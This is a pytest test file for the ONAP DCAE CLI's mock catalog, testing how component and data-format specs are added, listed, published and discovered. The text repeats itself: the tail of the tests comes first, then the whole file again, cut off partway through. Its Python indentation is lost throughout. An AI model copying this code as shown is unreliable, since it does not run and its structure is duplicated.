# duplicate is bad
with pytest.raises(DuplicateEntry):
mc.add_format(df1_spec, user)
# allow update of same version
new_descr = 'a new description'
df1_spec['self']['description'] = new_descr
mc.add_format(df1_spec, user, update=True)
# adding a new version is kosher
new_ver = '2.0.0'
df1_spec['self']['version'] = new_ver
mc.add_format(df1_spec, user)
# can't update a format that doesn't exist
with pytest.raises(MissingEntry):
mc.add_format(df2_spec, user, update=True)
# get spec and make sure it's updated
spec = mc.get_format_spec(df1_spec['self']['name'], version=None)
assert spec['self']['version'] == new_ver
assert spec['self']['description'] == new_descr
def test_discovery(mock_cli_config, mock_db_url, catalog=None):
'''Tests creation of discovery objects'''
if catalog is None:
mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
enforce_image=False, db_url=mock_db_url)
else:
mc = catalog
user = "test_discovery"
c1_spec = deepcopy(_c1_spec)
df1_spec = deepcopy(_df1_spec)
c2_spec = deepcopy(_c2_spec)
mc.add_format(df1_spec, user)
mc.add_component(user, c1_spec)
mc.add_component(user, c2_spec)
params, interfaces = mc.get_discovery_for_docker(c1_spec['self']['name'], c1_spec['self']['version'])
assert params == {'bar': 2, 'foo': 1}
assert interfaces == {'call1': [('std.comp_two', '1.0.0')], 'pub1': [('std.comp_two', '1.0.0')]}
def _spec_tuple(dd):
'''Returns a (name, version, component type) tuple from a given component spec dict'''
return dd['self']['name'], dd['self']['version'], dd['self']['component_type']
def _comp_tuple_set(*dds):
'''Runs a set of component spec tuples'''
return set(map(_spec_tuple, dds))
def _format_tuple(dd):
'''Returns a (name, version) tuple from a given data format spec dict'''
return dd['self']['name'], dd['self']['version']
def _format_tuple_set(*dds):
'''Runs a set of data format spec tuples'''
return set(map(_format_tuple, dds))
def test_comp_list(mock_cli_config, mock_db_url, catalog=None):
'''Tests the list functionality of the catalog'''
if catalog is None:
mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
enforce_image=False, db_url=mock_db_url)
else:
mc = catalog
user = "test_comp_list"
df1_spec = deepcopy(_df1_spec)
df2_spec = deepcopy(_df2_spec)
df2v2_spec = deepcopy(_df2v2_spec)
c1_spec = deepcopy(_c1_spec)
c2_spec = deepcopy(_c2_spec)
c2v2_spec = deepcopy(_c2v2_spec)
c3_spec = deepcopy(_c3_spec)
mc.add_format(df1_spec, user)
mc.add_format(df2_spec, user)
mc.add_format(df2v2_spec, user)
mc.add_component(user, c1_spec)
mc.add_component(user, c2_spec)
mc.add_component(user, c2v2_spec)
mc.add_component(user, c3_spec)
mc.add_component(user,_cdap_spec)
def components_to_specs(components):
return [ json.loads(c["spec"]) for c in components ]
# latest by default. only v2 of c2
components = mc.list_components()
specs = components_to_specs(components)
assert _comp_tuple_set(*specs) == _comp_tuple_set(c1_spec, c2v2_spec, c3_spec, _cdap_spec)
# all components
components = mc.list_components(latest=False)
specs = components_to_specs(components)
assert _comp_tuple_set(*specs) == _comp_tuple_set(c1_spec, c2_spec, c2v2_spec, c3_spec, _cdap_spec)
components = mc.list_components(subscribes=[('std.format_one', None)])
specs = components_to_specs(components)
assert _comp_tuple_set(*specs) == _comp_tuple_set(c1_spec, c2v2_spec)
# no comps subscribe to latest std.format_two
components = mc.list_components(subscribes=[('std.format_two', None)])
assert not components
components = mc.list_components(subscribes=[('std.format_two', '1.5.0')])
specs = components_to_specs(components)
assert _comp_tuple_set(*specs) == _comp_tuple_set(c3_spec, _cdap_spec)
# raise if format doesn't exist
with pytest.raises(MissingEntry):
mc.list_components(subscribes=[('std.format_two', '5.0.0')])
components = mc.list_components(publishes=[('std.format_one', None)])
specs = components_to_specs(components)
assert _comp_tuple_set(*specs) == _comp_tuple_set(c1_spec, _cdap_spec)
components = mc.list_components(calls=[(('std.format_one', None), ('std.format_one', None)), ])
specs = components_to_specs(components)
assert _comp_tuple_set(*specs) == _comp_tuple_set(c1_spec)
# raise if format doesn't exist
with pytest.raises(MissingEntry):
mc.list_components(calls=[(('std.format_one', '5.0.0'), ('std.format_one', None)), ])
components = mc.list_components(provides=[(('std.format_one', '1.0.0'), ('std.format_two', '1.5.0')), ])
specs = components_to_specs(components)
assert _comp_tuple_set(*specs) == _comp_tuple_set(c3_spec, _cdap_spec)
# test for listing published components
name_pub = c1_spec["self"]["name"]
version_pub = c1_spec["self"]["version"]
mc.publish_component(user, name_pub, version_pub)
components = mc.list_components(only_published=True)
specs = components_to_specs(components)
assert _comp_tuple_set(*specs) == _comp_tuple_set(c1_spec)
components = mc.list_components(only_published=False)
assert len(components) == 4
def test_format_list(mock_cli_config, mock_db_url, catalog=None):
'''Tests the list functionality of the catalog'''
if catalog is None:
mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
enforce_image=False, db_url=mock_db_url)
else:
mc = catalog
user = "test_format_list"
df1_spec = deepcopy(_df1_spec)
df2_spec = deepcopy(_df2_spec)
df2v2_spec = deepcopy(_df2v2_spec)
mc.add_format(df1_spec, user)
mc.add_format(df2_spec, user)
mc.add_format(df2v2_spec, user)
def formats_to_specs(components):
return [ json.loads(c["spec"]) for c in components ]
# latest by default. ensure only v2 of df2 makes it
formats = mc.list_formats()
specs = formats_to_specs(formats)
assert _format_tuple_set(*specs) == _format_tuple_set(df1_spec, df2v2_spec)
# list all
formats = mc.list_formats(latest=False)
specs = formats_to_specs(formats)
assert _format_tuple_set(*specs) == _format_tuple_set(df1_spec, df2_spec, df2v2_spec)
# test listing of published formats
name_pub = df1_spec["self"]["name"]
version_pub = df1_spec["self"]["version"]
mc.publish_format(user, name_pub, version_pub)
formats = mc.list_formats(only_published=True)
specs = formats_to_specs(formats)
assert _format_tuple_set(*specs) == _format_tuple_set(df1_spec)
formats = mc.list_formats(only_published=False)
assert len(formats) == 2
def test_component_add_cdap(mock_cli_config, mock_db_url, catalog=None):
'''Adds a mock CDAP application'''
if catalog is None:
mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
db_url=mock_db_url)
else:
mc = catalog
user = "test_component_add_cdap"
df1_spec = deepcopy(_df1_spec)
df2_spec = deepcopy(_df2_spec)
mc.add_format(df1_spec, user)
mc.add_format(df2_spec, user)
mc.add_component(user, _cdap_spec)
name, version, _ = _spec_tuple(_cdap_spec)
jar_out, cdap_config_out, spec_out = mc.get_cdap(name, version)
assert _cdap_spec["artifacts"][0]["uri"] == jar_out
assert _cdap_spec["auxilary"] == cdap_config_out
assert _cdap_spec == spec_out
def test_get_discovery_from_spec(mock_cli_config, mock_db_url):
mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
enforce_image=False, db_url=mock_db_url)
user = "test_get_discovery_from_spec"
c1_spec_updated = deepcopy(_c1_spec)
c1_spec_updated["streams"]["publishes"][0] = {
'format': 'std.format_one',
'version': '1.0.0',
'config_key': 'pub1',
'type': 'http'
}
c1_spec_updated["streams"]["subscribes"][0] = {
'format': 'std.format_one',
'version': '1.0.0',
'route': '/sub1',
'type': 'http'
}
# Case when c1 doesn't exist
mc.add_format(_df1_spec, user)
mc.add_component(user, _c2_spec)
actual_params, actual_interface_map, actual_dmaap_config_keys \
= mc.get_discovery_from_spec(user, c1_spec_updated, None)
assert actual_params == {'bar': 2, 'foo': 1}
assert actual_interface_map == { 'pub1': [('std.comp_two', '1.0.0')],
'call1': [('std.comp_two', '1.0.0')] }
assert actual_dmaap_config_keys == ([], [])
# Case when c1 already exist
mc.add_component(user,_c1_spec)
c1_spec_updated["services"]["calls"][0]["config_key"] = "callme"
actual_params, actual_interface_map, actual_dmaap_config_keys \
= mc.get_discovery_from_spec(user, c1_spec_updated, None)
assert actual_params == {'bar': 2, 'foo': 1}
assert actual_interface_map == { 'pub1': [('std.comp_two', '1.0.0')],
'callme': [('std.comp_two', '1.0.0')] }
assert actual_dmaap_config_keys == ([], [])
# Case where add in dmaap streams
# TODO: Add in subscribes test case after spec gets pushed
c1_spec_updated["streams"]["publishes"][0] = {
'format': 'std.format_one',
'version': '1.0.0',
'config_key': 'pub1',
'type': 'message router'
}
actual_params, actual_interface_map, actual_dmaap_config_keys \
= mc.get_discovery_from_spec(user, c1_spec_updated, None)
assert actual_params == {'bar': 2, 'foo': 1}
assert actual_interface_map == { 'callme': [('std.comp_two', '1.0.0')] }
assert actual_dmaap_config_keys == (["pub1"], [])
# Case when cdap spec doesn't exist
cdap_spec = deepcopy(_cdap_spec)
cdap_spec["streams"]["publishes"][0] = {
'format': 'std.format_one',
'version': '1.0.0',
'config_key': 'pub1',
'type': 'http'
}
cdap_spec["streams"]["subscribes"][0] = {
'format': 'std.format_two',
'version': '1.5.0',
'route': '/sub1',
'type': 'http'
}
mc.add_format(_df2_spec, user)
actual_params, actual_interface_map, actual_dmaap_config_keys \
= mc.get_discovery_from_spec(user, cdap_spec, None)
assert actual_params == {'program_preferences': [], 'app_config': {}, 'app_preferences': {}}
assert actual_interface_map == {'pub1': [('std.comp_two', '1.0.0'), ('std.comp_one', '1.0.0')]}
assert actual_dmaap_config_keys == ([], [])
def test_get_unpublished_formats(mock_cli_config, mock_db_url, catalog=None):
if catalog is None:
mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
enforce_image=False, db_url=mock_db_url)
else:
mc = catalog
user = "test_get_unpublished_formats"
mc.add_format(_df1_spec, user)
mc.add_component(user, _c1_spec)
# detect unpublished formats
name_to_pub = _c1_spec["self"]["name"]
version_to_pub = _c1_spec["self"]["version"]
formats = mc.get_unpublished_formats(name_to_pub, version_to_pub)
assert [('std.format_one', '1.0.0')] == formats
# all formats published
mc.publish_format(user, _df1_spec["self"]["name"], _df1_spec["self"]["version"])
formats = mc.get_unpublished_formats(name_to_pub, version_to_pub)
assert len(formats) == 0
def test_get_unique_format_things():
def create_tuple(entry):
return (entry["name"], entry["version"])
def get_orm(name, version):
return ("ORM", name, version)
entries = [{"name": "abc", "version": 123},
{"name": "abc", "version": 123},
{"name": "abc", "version": 123},
{"name": "def", "version": 456},
{"name": "def", "version": 456}]
get_unique_fake_format = partial(_get_unique_format_things, create_tuple,
get_orm)
expected = [("ORM", "abc", 123), ("ORM", "def", 456)]
assert sorted(expected) == sorted(get_unique_fake_format(entries))
def test_filter_latest():
orms = [('std.empty.get', '1.0.0'), ('std.unknown', '1.0.0'),
('std.unknown', '1.0.1'), ('std.empty.get', '1.0.1')]
assert list(catalog._filter_latest(orms)) == [('std.empty.get', '1.0.1'), \
('std.unknown', '1.0.1')]
def test_raise_if_duplicate():
class FakeOrig(object):
args = ["unique", "duplicate"]
url = "sqlite"
orig = FakeOrig()
error = IntegrityError("Error about uniqueness", None, orig)
with pytest.raises(catalog.DuplicateEntry):
catalog._raise_if_duplicate(url, error)
# Couldn't find psycopg2.IntegrityError constructor nor way
# to set pgcode so decided to mock it.
class FakeOrigPostgres(object):
pgcode = "23505"
url = "postgres"
orig = FakeOrigPostgres()
error = IntegrityError("Error about uniqueness", None, orig)
with pytest.raises(catalog.DuplicateEntry):
catalog._raise_if_duplicate(url, error)
def test_get_docker_image_from_spec():
assert "foo-image" == catalog._get_docker_image_from_spec(_c1_spec)
def test_get_cdap_jar_from_spec():
assert "bahpomet.com" == catalog._get_cdap_jar_from_spec(_cdap_spec)
def test_build_config_keys_map():
stub_spec = {
'streams': {
'publishes': [
{'format': 'std.format_one', 'version': '1.0.0',
'config_key': 'pub1', 'type': 'http'},
{'format': 'std.format_one', 'version': '1.0.0',
'config_key': 'pub2', 'type': 'message_router'}
],
'subscribes': [
{'format': 'std.format_one', 'version': '1.0.0', 'route': '/sub1',
'type': 'http'},
{'format': 'std.format_one', 'version': '1.0.0',
'config_key': 'sub2', 'type': 'message_router'}
]
},
'services': {
'calls': [
{'request': {'format': 'std.format_one', 'version': '1.0.0'},
'response': {'format': 'std.format_one', 'version': '1.0.0'},
'config_key': 'call1'}
],
'provides': [
{'request': {'format': 'std.format_one', 'version': '1.0.0'},
'response': {'format': 'std.format_one', 'version': '1.0.0'},
'route': '/prov1'}
]
}
}
grouping = catalog.build_config_keys_map(stub_spec)
expected = {'call1': {'group': 'services_calls'}, 'pub1': {'type': 'http', 'group': 'streams_publishes'}, 'sub2': {'type': 'message_router', 'group': 'streams_subscribes'}, 'pub2': {'type': 'message_router', 'group': 'streams_publishes'}}
assert expected == grouping
def test_get_data_router_subscriber_route():
spec = {"streams": {"subscribes": [ { "type": "data_router", "config_key":
"alpha", "route": "/alpha" }, { "type": "message_router", "config_key":
"beta" } ]}}
assert "/alpha" == catalog.get_data_router_subscriber_route(spec, "alpha")
with pytest.raises(catalog.MissingEntry):
catalog.get_data_router_subscriber_route(spec, "beta")
with pytest.raises(catalog.MissingEntry):
catalog.get_data_router_subscriber_route(spec, "gamma")
if __name__ == '__main__':
'''Test area'''
pytest.main([__file__, ])
| # ============LICENSE_START=======================================================
# org.onap.dcae
# ================================================================================
# Copyright (c) 2017-2018 AT&T Intellectual Property. All rights reserved.
# ================================================================================
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============LICENSE_END=========================================================
#
# ECOMP is a trademark and service mark of AT&T Intellectual Property.
# -*- coding: utf-8 -*-
'''
Tests the mock catalog
'''
import json
from copy import deepcopy
from functools import partial
import pytest
from sqlalchemy.exc import IntegrityError
from dcae_cli.catalog.mock.catalog import MockCatalog, MissingEntry, DuplicateEntry, _get_unique_format_things
from dcae_cli.catalog.mock import catalog
_c1_spec = {'self': {'name': 'std.comp_one',
'version': '1.0.0',
'description': 'comp1',
'component_type': 'docker'},
'streams': {'publishes': [{'format': 'std.format_one',
'version': '1.0.0',
'config_key': 'pub1',
'type': 'http'}],
'subscribes': [{'format': 'std.format_one',
'version': '1.0.0',
'route': '/sub1',
'type': 'http'}]},
'services': {'calls': [{'request': {'format': 'std.format_one',
'version': '1.0.0'},
'response': {'format': 'std.format_one',
'version': '1.0.0'},
'config_key': 'call1'}],
'provides': [{'request': {'format': 'std.format_one',
'version': '1.0.0'},
'response': {'format': 'std.format_one',
'version': '1.0.0'},
'route': '/prov1'}]},
'parameters': [{"name": "foo",
"value": 1,
"description": "the foo thing",
"designer_editable": False,
"sourced_at_deployment": False,
"policy_editable": False},
{"name": "bar",
"value": 2,
"description": "the bar thing",
"designer_editable": False,
"sourced_at_deployment": False,
"policy_editable": False}
],
'artifacts': [{ "uri": "foo-image", "type": "docker image" }],
'auxilary': {
"healthcheck": {
"type": "http",
"endpoint": "/health",
"interval": "15s",
"timeout": "1s"
}
}
}
_c2_spec = {'self': {'name': 'std.comp_two',
'version': '1.0.0',
'description': 'comp2',
'component_type': 'docker'},
'streams': {'publishes': [],
'subscribes': [{'format': 'std.format_one',
'version': '1.0.0',
'route': '/sub1',
'type': 'http'}]},
'services': {'calls': [],
'provides': [{'request': {'format': 'std.format_one',
'version': '1.0.0'},
'response': {'format': 'std.format_one',
'version': '1.0.0'},
'route': '/prov1'}]},
'parameters': [],
'artifacts': [{ "uri": "bar-image", "type": "docker image" }],
'auxilary': {
"healthcheck": {
"type": "http",
"endpoint": "/health",
"interval": "15s",
"timeout": "1s"
}
}
}
_c2v2_spec = {'self': {'name': 'std.comp_two',
'version': '2.0.0',
'description': 'comp2',
'component_type': 'docker'},
'streams': {'publishes': [],
'subscribes': [{'format': 'std.format_one',
'version': '1.0.0',
'route': '/sub1',
'type': 'http'}]},
'services': {'calls': [],
'provides': [{'request': {'format': 'std.format_one',
'version': '1.0.0'},
'response': {'format': 'std.format_one',
'version': '1.0.0'},
'route': '/prov1'}]},
'parameters': [],
'artifacts': [{ "uri": "baz-image", "type": "docker image" }],
'auxilary': {
"healthcheck": {
"type": "http",
"endpoint": "/health",
"interval": "15s",
"timeout": "1s"
}
}
}
_c3_spec = {'self': {'name': 'std.comp_three',
'version': '3.0.0',
'description': 'comp3',
'component_type': 'docker'},
'streams': {'publishes': [],
'subscribes': [{'format': 'std.format_two',
'version': '1.5.0',
'route': '/sub1',
'type': 'http'}]},
'services': {'calls': [],
'provides': [{'request': {'format': 'std.format_one',
'version': '1.0.0'},
'response': {'format': 'std.format_two',
'version': '1.5.0'},
'route': '/prov1'}]},
'parameters': [],
'artifacts': [{ "uri": "bazinga-image", "type": "docker image" }],
'auxilary': {
"healthcheck": {
"type": "http",
"endpoint": "/health",
"interval": "15s",
"timeout": "1s"
}
}
}
_df1_spec = {
"self": {
"name": "std.format_one",
"version": "1.0.0",
"description": "df1"
},
"dataformatversion": "1.0.0",
"jsonschema": {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"raw-text": {
"type": "string"
}
},
"required": ["raw-text"],
"additionalProperties": False
}
}
_df2_spec = {
"self": {
"name": "std.format_two",
"version": "1.5.0",
"description": "df2"
},
"dataformatversion": "1.0.0",
"jsonschema": {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"raw-text": {
"type": "string"
}
},
"required": ["raw-text"],
"additionalProperties": False
}
}
_df2v2_spec = {
"self": {
"name": "std.format_two",
"version": "2.0.0",
"description": "df2"
},
"dataformatversion": "1.0.0",
"jsonschema": {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"raw-text": {
"type": "string"
}
},
"required": ["raw-text"],
"additionalProperties": False
}
}
_cdap_spec={
"self":{
"name":"std.cdap_comp",
"version":"0.0.0",
"description":"cdap test component",
"component_type":"cdap"
},
"streams":{
"publishes":[
{
"format":"std.format_one",
"version":"1.0.0",
"config_key":"pub1",
"type": "http"
}
],
"subscribes":[
{
"format":"std.format_two",
"version":"1.5.0",
"route":"/sub1",
"type": "http"
}
]
},
"services":{
"calls":[
],
"provides":[
{
"request":{
"format":"std.format_one",
"version":"1.0.0"
},
"response":{
"format":"std.format_two",
"version":"1.5.0"
},
"service_name":"baphomet",
"service_endpoint":"rises",
"verb":"GET"
}
]
},
"parameters": {
"app_config" : [],
"app_preferences" : [],
"program_preferences" : []
},
"artifacts": [{"uri": "bahpomet.com", "type": "jar"}],
"auxilary": {
"streamname":"streamname",
"artifact_version":"6.6.6",
"artifact_name": "test_name",
"programs" : [{"program_type" : "flows", "program_id" : "flow_id"}]
}
}
def test_component_basic(mock_cli_config, mock_db_url, catalog=None):
'''Tests basic component usage of MockCatalog'''
if catalog is None:
mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
enforce_image=False, db_url=mock_db_url)
else:
mc = catalog
c1_spec = deepcopy(_c1_spec)
df1_spec = deepcopy(_df1_spec)
df2_spec = deepcopy(_df2_spec)
user = "test_component_basic"
# success
mc.add_format(df2_spec, user)
# duplicate
with pytest.raises(DuplicateEntry):
mc.add_format(df2_spec, user)
# component relies on df1_spec which hasn't been added
with pytest.raises(MissingEntry):
mc.add_component(user, c1_spec)
# add df1 and comp1
mc.add_format(df1_spec, user)
mc.add_component(user, c1_spec)
with pytest.raises(DuplicateEntry):
mc.add_component(user, c1_spec)
cname, cver = mc.verify_component('std.comp_one', version=None)
assert cver == '1.0.0'
def test_format_basic(mock_cli_config, mock_db_url, catalog=None):
'''Tests basic data format usage of MockCatalog'''
if catalog is None:
mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
db_url=mock_db_url)
else:
mc = catalog
user = "test_format_basic"
df1_spec = deepcopy(_df1_spec)
df2_spec = deepcopy(_df2_spec)
# success
mc.add_format(df1_spec, user)
# duplicate is bad
with pytest.raises(DuplicateEntry):
mc.add_format(df1_spec, user)
# allow update of same version
new_descr = 'a new description'
df1_spec['self']['description'] = new_descr
mc.add_format(df1_spec, user, update=True)
# adding a new version is kosher
new_ver = '2.0.0'
df1_spec['self']['version'] = new_ver
mc.add_format(df1_spec, user)
# can't update a format that doesn't exist
with pytest.raises(MissingEntry):
mc.add_format(df2_spec, user, update=True)
# get spec and make sure it's updated
spec = mc.get_format_spec(df1_spec['self']['name'], version=None)
assert spec['self']['version'] == new_ver
assert spec['self']['description'] == new_descr
def test_discovery(mock_cli_config, mock_db_url, catalog=None):
'''Tests creation of discovery objects'''
if catalog is None:
mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
enforce_image=False, db_url=mock_db_url)
else:
mc = catalog
user = "test_discovery"
c1_spec = deepcopy(_c1_spec)
df1_spec = deepcopy(_df1_spec)
c2_spec = deepcopy(_c2_spec)
mc.add_format(df1_spec, user)
mc.add_component(user, c1_spec)
mc.add_component(user, c2_spec)
params, interfaces = mc.get_discovery_for_docker(c1_spec['self']['name'], c1_spec['self']['version'])
assert params == {'bar': 2, 'foo': 1}
assert interfaces == {'call1': [('std.comp_two', '1.0.0')], 'pub1': [('std.comp_two', '1.0.0')]}
def _spec_tuple(dd):
'''Returns a (name, version, component type) tuple from a given component spec dict'''
return dd['self']['name'], dd['self']['version'], dd['self']['component_type']
def _comp_tuple_set(*dds):
'''Runs a set of component spec tuples'''
return set(map(_spec_tuple, dds))
def _format_tuple(dd):
'''Returns a (name, version) tuple from a given data format spec dict'''
return dd['self']['name'], dd['self']['version']
def _format_tuple_set(*dds):
'''Runs a set of data format spec tuples'''
return set(map(_format_tuple, dds))
def test_comp_list(mock_cli_config, mock_db_url, catalog=None):
'''Tests the list functionality of the catalog'''
if catalog is None:
mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
enforce_image=False, db_url=mock_db_url)
else:
mc = catalog
user = "test_comp_list"
df1_spec = deepcopy(_df1_spec)
df2_spec = deepcopy(_df2_spec)
df2v2_spec = deepcopy(_df2v2_spec)
c1_spec = deepcopy(_c1_spec)
c2_spec = deepcopy(_c2_spec)
c2v2_spec = deepcopy(_c2v2_spec)
c3_spec = deepcopy(_c3_spec)
mc.add_format(df1_spec, user)
mc.add_format(df2_spec, user)
mc.add_format(df2v2_spec, user)
mc.add_component(user, c1_spec)
mc.add_component(user, c2_spec)
mc.add_component(user, c2v2_spec)
mc.add_component(user, c3_spec)
mc.add_component(user,_cdap_spec)
def components_to_specs(components):
return [ json.loads(c["spec"]) for c in components ]
# latest by default. only v2 of c2
components = mc.list_components()
specs = components_to_specs(components)
assert _comp_tuple_set(*specs) == _comp_tuple_set(c1_spec, c2v2_spec, c3_spec, _cdap_spec)
# all components
components = mc.list_components(latest=False)
specs = components_to_specs(components)
assert _comp_tuple_set(*specs) == _comp_tuple_set(c1_spec, c2_spec, c2v2_spec, c3_spec, _cdap_spec)
components = mc.list_components(subscribes=[('std.format_one', None)])
specs = components_to_specs(components)
assert _comp_tuple_set(*specs) == _comp_tuple_set(c1_spec, c2v2_spec)
# no comps subscribe to latest std.format_two
components = mc.list_components(subscribes=[('std.format_two', None)])
assert not components
components = mc.list_components(subscribes=[('std.format_two', '1.5.0')])
specs = components_to_specs(components)
assert _comp_tuple_set(*specs) == _comp_tuple_set(c3_spec, _cdap_spec)
# raise if format doesn't exist
with pytest.raises(MissingEntry):
mc.list_components(subscribes=[('std.format_two', '5.0.0')])
components = mc.list_components(publishes=[('std.format_one', None)])
specs = components_to_specs(components)
assert _comp_tuple_set(*specs) == _comp_tuple_set(c1_spec, _cdap_spec)
components = mc.list_components(calls=[(('std.format_one', None), ('std.format_one', None)), ])
specs = components_to_specs(components)
assert _comp_tuple_set(*specs) == _comp_tuple_set(c1_spec)
# raise if format doesn't exist
with pytest.raises(MissingEntry):
mc.list_components(calls=[(('std.format_one', '5.0.0'), ('std.format_one', None)), ])
components = mc.list_components(provides=[(('std.format_one', '1.0.0'), ('std.format_two', '1.5.0')), ])
specs = components_to_specs(components)
assert _comp_tuple_set(*specs) == _comp_tuple_set(c3_spec, _cdap_spec)
# test for listing published components
name_pub = c1_spec["self"]["name"]
version_pub = c1_spec["self"]["version"]
mc.publish_component(user, name_pub, version_pub)
components = mc.list_components(only_published=True)
specs = components_to_specs(components)
assert _comp_tuple_set(*specs) == _comp_tuple_set(c1_spec)
components = mc.list_components(only_published=False)
assert len(components) == 4
def test_format_list(mock_cli_config, mock_db_url, catalog=None):
'''Tests the list functionality of the catalog'''
if catalog is None:
mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
enforce_image=False, db_url=mock_db_url)
else:
mc = catalog
user = "test_format_list"
df1_spec = deepcopy(_df1_spec)
df2_spec = deepcopy(_df2_spec)
df2v2_spec = deepcopy(_df2v2_spec)
mc.add_format(df1_spec, user)
mc.add_format(df2_spec, user)
mc.add_format(df2v2_spec, user)
def formats_to_specs(components):
return [ json.loads(c["spec"]) for c in components ]
# latest by default. ensure only v2 of df2 makes it
formats = mc.list_formats()
specs = formats_to_specs(formats)
assert _format_tuple_set(*specs) == _format_tuple_set(df1_spec, df2v2_spec)
# list all
formats = mc.list_formats(latest=False)
specs = formats_to_specs(formats)
assert _format_tuple_set(*specs) == _format_tuple_set(df1_spec, df2_spec, df2v2_spec)
# test listing of published formats
name_pub = df1_spec["self"]["name"]
version_pub = df1_spec["self"]["version"]
mc.publish_format(user, name_pub, version_pub)
formats = mc.list_formats(only_published=True)
specs = formats_to_specs(formats)
assert _format_tuple_set(*specs) == _format_tuple_set(df1_spec)
formats = mc.list_formats(only_published=False)
assert len(formats) == 2
def test_component_add_cdap(mock_cli_config, mock_db_url, catalog=None):
'''Adds a mock CDAP application'''
if catalog is None:
mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
db_url=mock_db_url)
else:
mc = catalog
user = "test_component_add_cdap"
df1_spec = deepcopy(_df1_spec)
df2_spec = deepcopy(_df2_spec)
mc.add_format(df1_spec, user)
mc.add_format(df2_spec, user)
mc.add_component(user, _cdap_spec)
name, version, _ = _spec_tuple(_cdap_spec)
jar_out, cdap_config_out, spec_out = mc.get_cdap(name, version)
assert _cdap_spec["artifacts"][0]["uri"] == jar_out
assert _cdap_spec["auxilary"] == cdap_config_out
assert _cdap_spec == spec_out
def test_get_discovery_from_spec(mock_cli_config, mock_db_url):
mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
enforce_image=False, db_url=mock_db_url)
user = "test_get_discovery_from_spec"
c1_spec_updated = deepcopy(_c1_spec)
c1_spec_updated["streams"]["publishes"][0] = {
'format': 'std.format_one',
'version': '1.0.0',
'config_key': 'pub1',
'type': 'http'
}
c1_spec_updated["streams"]["subscribes"][0] = {
'format': 'std.format_one',
'version': '1.0.0',
'route': '/sub1',
'type': 'http'
}
# Case when c1 doesn't exist
mc.add_format(_df1_spec, user)
mc.add_component(user, _c2_spec)
actual_params, actual_interface_map, actual_dmaap_config_keys \
= mc.get_discovery_from_spec(user, c1_spec_updated, None)
assert actual_params == {'bar': 2, 'foo': 1}
assert actual_interface_map == { 'pub1': [('std.comp_two', '1.0.0')],
'call1': [('std.comp_two', '1.0.0')] }
assert actual_dmaap_config_keys == ([], [])
# Case when c1 already exist
mc.add_component(user,_c1_spec)
c1_spec_updated["services"]["calls"][0]["config_key"] = "callme"
actual_params, actual_interface_map, actual_dmaap_config_keys \
= mc.get_discovery_from_spec(user, c1_spec_updated, None)
assert actual_params == {'bar': 2, 'foo': 1}
assert actual_interface_map == { 'pub1': [('std.comp_two', '1.0.0')],
'callme': [('std.comp_two', '1.0.0')] }
assert actual_dmaap_config_keys == ([], [])
# Case where add in dmaap streams
# TODO: Add in subscribes test case after spec gets pushed
c1_spec_updated["streams"]["publishes"][0] = {
'format': 'std.format_one',
'version': '1.0.0',
'config_key': 'pub1',
'type': 'message router'
}
actual_params, actual_interface_map, actual_dmaap_config_keys \
= mc.get_discovery_from_spec(user, c1_spec_updated, None)
assert actual_params == {'bar': 2, 'foo': 1}
assert actual_interface_map == { 'callme': [('std.comp_two', '1.0.0')] }
assert actual_dmaap_config_keys == (["pub1"], [])
# Case when cdap spec doesn't exist
cdap_spec = deepcopy(_cdap_spec)
cdap_spec["streams"]["publishes"][0] = {
'format': 'std.format_one',
'version': '1.0.0',
'config_key': 'pub1',
'type': 'http'
}
cdap_spec["streams"]["subscribes"][0] = {
'format': 'std.format_two',
'version': '1.5.0',
'route': '/sub1',
'type': 'http'
}
mc.add_format(_df2_spec, user)
actual_params, actual_interface_map, actual_dmaap_config_keys \
= mc.get_discovery_from_spec(user, cdap_spec, None)
assert actual_params == {'program_preferences': [], 'app_config': {}, 'app_preferences': {}}
assert actual_interface_map == {'pub1': [('std.comp_two', '1.0.0'), ('std.comp_one', '1.0.0')]}
assert actual_dmaap_config_keys == ([], [])
def test_get_unpublished_formats(mock_cli_config, mock_db_url, catalog=None):
if catalog is None:
mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
enforce_image=False, db_url=mock_db_url)
else:
mc = catalog
user = "test_get_unpublished_formats"
mc.add_format(_df1_spec, user)
mc.add_component(user, _c1_spec)
# detect unpublished formats
name_to_pub = _c1_spec["self"]["name"]
version_to_pub = _c1_spec["self"]["version"]
formats = mc.get_unpublished_formats(name_to_pub, version_to_pub)
assert [('std.format_one', '1.0.0')] == formats
# all formats published
mc.publish_format(user, _df1_spec["self"]["name"], _df1_spec["self"]["version"])
formats = mc.get_unpublished_formats(name_to_pub, version_to_pub)
assert len(formats) == 0
def test_get_unique_format_things():
def create_tuple(entry):
return (entry["name"], entry["version"])
def get_orm(name, version):
return ("ORM", name, version)
entries = [{"name": "abc", "version": 123},
{"name": "abc", "version": 123},
{"name": "abc", "version": 123},
{"name": "def", "version": 456},
{"name": "def", "version": 456}]
get_unique_fake_format = partial(_get_unique_format_things, create_tuple,
get_orm)
expected = [("ORM", "abc", 123), ("ORM", "def", 456)]
assert sorted(expected) == sorted(get_unique_fake_format(entries))
def test_filter_latest():
orms = [('std.empty.get', '1.0.0'), ('std.unknown', '1.0.0'),
